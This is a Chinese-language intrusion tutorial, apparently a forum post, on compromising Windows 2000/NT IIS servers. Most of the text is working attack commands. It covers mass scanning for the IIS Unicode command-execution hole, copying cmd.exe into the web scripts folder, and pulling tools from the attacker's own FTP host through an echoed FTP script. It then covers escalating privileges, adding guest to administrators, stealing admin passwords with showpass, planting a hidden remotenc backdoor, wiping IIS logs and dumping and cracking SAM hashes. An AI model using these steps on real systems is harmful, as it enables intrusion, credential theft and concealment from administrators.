先介紹一些系統(tǒng)入侵的一些常用方法:
先用流光(在iv FOR 2000/nt/xp的版本下)
一般我都是用SQL掃描(現(xiàn)在的流光都有IIS/PRONTPAGE掃描了,那就用這個),然后利用的是iis遠(yuǎn)程執(zhí)行命令漏洞,這個漏洞你應(yīng)該知道一般有這個漏洞就有U漏洞,但是有U漏洞不一定有這個漏洞,所以我一般都掃個2-3萬臺
(網(wǎng)段)比如111.111.1.1-111.111.100.255
然后就去干別的,運(yùn)氣再不好,也有個好多臺。
然后呢?我的手法是這樣的
在IIS遠(yuǎn)程執(zhí)行命令漏洞下(這個漏洞流光可以連接,其實(shí)就是U漏洞的各種類型,也就說你掃到U漏洞了用我以下寫的手法一樣非常容易入侵一臺機(jī)器:),打入
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe(如果是U漏洞在IE上打入:..../scripts/cmd.exe?/c+copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe)
其實(shí)在IIS遠(yuǎn)程執(zhí)行命令漏洞下我們一般能用到的DOS命令(常用的)
是set查看他的網(wǎng)站結(jié)構(gòu),dir查看上傳情況(記的常用dir c:\xxx/s這個命令)
(此時可以在IE上打入ip/scripts/treasure.exe?/c+set,很有成就感是嗎?)
雖然很多時候用SET就能看到網(wǎng)站的WEB目錄但是更多的時候還是要用到這個命令
PATH_TRANSLATED=c:\inetpub\wwwroot
這個就是SET后的結(jié)果中的一句話
這個就是網(wǎng)站的WEB目錄,那如果沒這句話呢?沒關(guān)系用DIR C:\XXX/S這個命令啊
網(wǎng)站上隨便找張圖點(diǎn)右鍵,看到圖的名字了吧呵呵替換XXX呵呵:)如果C盤下沒有?
呵呵試到F盤:)肯定會有的哈哈
SET還可以查看到很多東東呢:)好好去實(shí)驗吧,比如SCRIPTS目錄,我還碰到過
SCRIPTS目錄是c:\progra~1\....\masca什么的呢:)這個你多實(shí)驗肯定會知道的
接著呢我比較喜歡在IE上做事,其實(shí)在IIS遠(yuǎn)程命令執(zhí)行漏洞上利用是一樣的
ip/scripts/treasure.exe?/c+
這里你該明白了,我們權(quán)限很小,一般只能在這里用FTP或者TFTP上傳:)
tftp的命令為
ip/scripts/treasure.exe?/c+tftp+ip+get+idq.dll+c:\inetpub\scripts\idq.dll
FTP的命令為
ip/scripts/treasure.exe?/c+echo+open+free.tsee.net>bbs.txt (你的FTP站點(diǎn),在DOS下用FTP命令你就明白我所寫了語句了)
ip/scripts/treasure.exe?/c+echo+treasure>>bbs.txt(ftp用戶名)
ip/scripts/treasure.exe?/c+echo+123456>>bbs.txt(ftp密碼)
ip/scripts/treasure.exe?/c+echo+get+idq.dll>>bbs.txt(idq.dll利用044漏洞入侵的,呵呵直接運(yùn)行IDQ。DLL亦可以得到個ADMINISTRATOR用戶和密碼,iisuser,密碼是abcd1234.)
直接運(yùn)行的命令為ip/scripts/treasure.exe?/c+c:\inetpub\scripts\idq.dll(直接運(yùn)行其他程序也是一樣的用法,聰明的人應(yīng)該現(xiàn)在就看出來了用的全是DOS命令)
ip/scripts/treasure.exe?/c+echo+bye>>bbs.txt
ip/scripts/treasure.exe?/c+ftp+-s:bbs.txt(ftp命令的高級使用了吧呵呵)
注意>是完全替換就是說BBS。TXT原來是存在的用>寫就用現(xiàn)在的語句替換了,>>是寫第二行第三行,
依次類推
這里要注意的是bbs.txt最后一定要刪除,這里留下了你的FTP站點(diǎn)名字和你的用戶名和密碼
如果你下次還想用的話呵呵最好刪除了(給個建議用臺肉雞開個FTP自己建立用戶名和密碼)
那樣最方便了:)用肉雞做事
然后呢就好辦了
ispc ip/scripts/idq.dll
這里要補(bǔ)充的是,既然我們掃的是SQL出來的是IIS漏洞,當(dāng)然能利用IDQ。DLL了,
其實(shí)有時候你掃到弱IPC密碼和用戶,他沒開HTTP或者沒用IIS那樣的話呵呵,IDQ。DLL用不上了
我們只能上傳些木馬類的了。
這個是很好的后門,我最喜歡用這個了
別忘記連接后要按三次回車算一次的。
接著一般以我的手法是激活guest
net user guest /active:yes
net user guest 123456
net localgroup administrators guest /add
然后呢用ipc連接傳個showpass到他的system32目錄下呵呵肯定用的上的
net use \\ip\ipc$ "800214520" /user:"guest"
copy showpass.exe \\ip\admin$\system32\showpass.exe
net use \\ip\ipc$ /delete(呵呵習(xí)慣要好)
這里要說明的是有興趣的朋友亦可以上傳IRC木馬和csrss.exe(簡短說明: 本軟件可以在Nt4.0/Win2000的系統(tǒng)上面添加Administrators權(quán)限賬號,由于采用時間添加方式,以任務(wù)方式添加賬號,在中午12點(diǎn)整時自動添加賬號,13點(diǎn)時刪除賬號,18點(diǎn)時添加賬號,19點(diǎn)時刪除賬號,23點(diǎn)時添加賬號,0點(diǎn)刪除賬號,由于以上幾個時間段都是網(wǎng)管最容易忽視的時間,網(wǎng)管根本不會想到你會擁有Administrators權(quán)限
賬號,從而使得你的勞動結(jié)果不會被破壞,:)
IRC木馬不介紹的原因是太可怕,亦是我認(rèn)為唯一算的上是好木馬
說到開后門了
其實(shí)在上步的時候有興趣的朋友可以上傳ASP后門(不推薦覺的權(quán)限不夠大)
這里我們用的是remotenc
remotenc沒有日志記錄(爽嗎?)呵呵
remotenc對付administrator密碼為空的時候輸入""(嘿嘿)
remotenc的說明呵呵詳細(xì)吧
RemoteNC <IP> <Username> <Password> <Starting Mode>
<Service Name> <Description Name>
<Listen Port> <Control Password> [/OVERWRITE]
remotenc x.x.x.x 用戶 密碼 (LocalSystem or RunAsUser 任選一下) 服務(wù)名 服務(wù)描述 監(jiān)聽端口 控制密碼 [是否覆蓋原有服務(wù)]
這里介紹一下我朋友說的隱藏REMOTENC的方法沒用過(呵呵不是經(jīng)驗之談了懶啊沒辦法)
remotenc 192.***.***.*** Administrator 123456 localsystem Server Server 7 123456(創(chuàng)建remotenc后門)
telnet后門后
dir server.exe
attriv server.exe +h +r
dir server.exe
呵呵用的是DOS命令(很實(shí)用啊)
別人不能覆蓋你的后門了(因為是只讀)
當(dāng)然了有興趣的可以裝個Sniffer
還有的是remotenc的補(bǔ)充說明(可以本地安裝)方便吧:)
可以TELNET后用SHOWPASS(這就是為什么放在system32下的原因了)
SHOWPASS的實(shí)用,他本地機(jī)器用ADMINISTRATOR登陸后呵呵:)我們SHOWPASS肯定能得到
ADMINISTRATOR的密碼哈哈爽嗎?
很多時候這個密碼在SQL和FTP還有PCANYWHERE里面都是通用的啊
有個軟件要注意
dwrcc這里要說明的是這個軟件不推薦,但是確實(shí)很實(shí)用(只要能建立IPC連接就能用這個了,大多數(shù)情況)主要這個是圖形界面的。但是如果你機(jī)器突然之間下面多了個圖標(biāo)或者有時候鼠標(biāo)移動有些問題,呵呵你會怎么想? 介紹一下我關(guān)于使用SHOWPASS的經(jīng)驗;)
你已經(jīng)會ispc提升權(quán)限,idq.dll(也可以當(dāng)作后門使用),會出現(xiàn)提示符
c:\winnt\system32\>showpass(在這里輸入一樣ok,前提當(dāng)然已經(jīng)用copy showpass.exe \\ip\admin$\system32,傳到這個目錄了)
用remotenc開了后門以后telnet上去輸入showpass(COPY是必須的)
成功率相當(dāng)?shù)母,前提是他那臺機(jī)器本地用administrator已經(jīng)登陸,好象WIN2000/NT 把管理員的密碼登陸后存放在內(nèi)存里了還是明文的..
知道管理員的密碼不就又是個后門了,更多的是管理員的密碼==pcanywhere的密碼=sql的密碼哈哈哈哈
showpass的原理(meteor寫的我沒看懂)
GetWindowText()
and TextOut() window API's
REMOTENC本地安裝IP改成127.0.0.1
還有的是REMOTENC有兩種模式可以安裝推薦第一種:)90%的機(jī)器都能安裝成功的(呵呵沒裝個好的防火墻)
現(xiàn)在的經(jīng)驗是不需要這個也可以IDQ.DLL亦是個好后門不會被殺
還有你REMOTENC裝好后就把GUEST 停用吧:)保險點(diǎn)
呵呵別忘記刪除日志(這個不是我的習(xí)慣,不要跟我學(xué)習(xí))
cleaniislog.exe . 你的ip //刪除所有日至中有你的ip的紀(jì)錄。
cleaniislog.exe C:\winnt\system32\logfiles\w3svc1\ex020208.log 你的ip //指定刪除一個日志文件中你的ip紀(jì)錄。
p.s: 不一定是w3svc1,有可能是w3svc2 ,vc3等, ex020208 為02年02月08號的日志,即當(dāng)天日志。
如果不是~
運(yùn)行:cleaniislog.exe /? 看看幫助。 (這個也不是我寫的)
隨便看看吧,我的建議是手動改日志
文件目錄(唉呀你沒看到上面的語句。
關(guān)于ispc和IDQ.DLL呵呵前面介紹了這里就不說了,反正就這么用(idq.dll可以改成數(shù)個名字亦可以使用)
還要推薦個PIPEUPADMIN這個軟件很多朋友問我有GUEST用戶能上傳文件該怎么辦,
好簡單啊:)用這個軟件啊上傳后運(yùn)行就可以了啊:)呵呵強(qiáng)制提升權(quán)限。
還有啊pwdump3這個軟件是抓回SAM擋的:)(有用戶名和密碼就可以抓回了)LC3破好了
42天內(nèi)(不管密碼多復(fù)雜沒有破不了的,我討厭暴力破解我是個沒耐心的人)
剛想起來了朋友問我怎么看主頁很簡單啊,用
ip/scripts/treasure.exe?/c+type+c:\xxx\xxx.htm
嘿嘿這個是查看文件的目錄,你試一下效果好嗎?呵呵其實(shí)一般找到WEB目錄的路徑我就不信找不到他的主頁
這里要補(bǔ)充的是。其實(shí)IIS遠(yuǎn)程執(zhí)行命令漏洞就是U漏洞的幾個類型從A-F:(我好象也剛領(lǐng)悟)
所以U漏洞也一樣利用我寫的手法,成功率非常之高。國內(nèi)很多日10萬IP的網(wǎng)站依然有此漏洞。為什么我很多時間不深入探討PRINTER溢出,PRINTER溢出針對的是沒打SP2的:(那沒打SP2的肯定有U漏洞了。多思考你會比別人進(jìn)步的更快。
這里還要提供一個入侵的新思路如果我用U漏洞或者用FTP能訪問他的目錄或者其他的方法能訪問他的目錄并且有刪除文件的功能。試試刪除了他的winnt/repair和winnt/config下的SAM文件。(2000為SAM,NT為SAM._ )
這篇好像是CRACKER入侵啊。呵呵不管了。呵呵寫了這么長手酸了,明天再補(bǔ)充點(diǎn)吧。今天就到這里吧。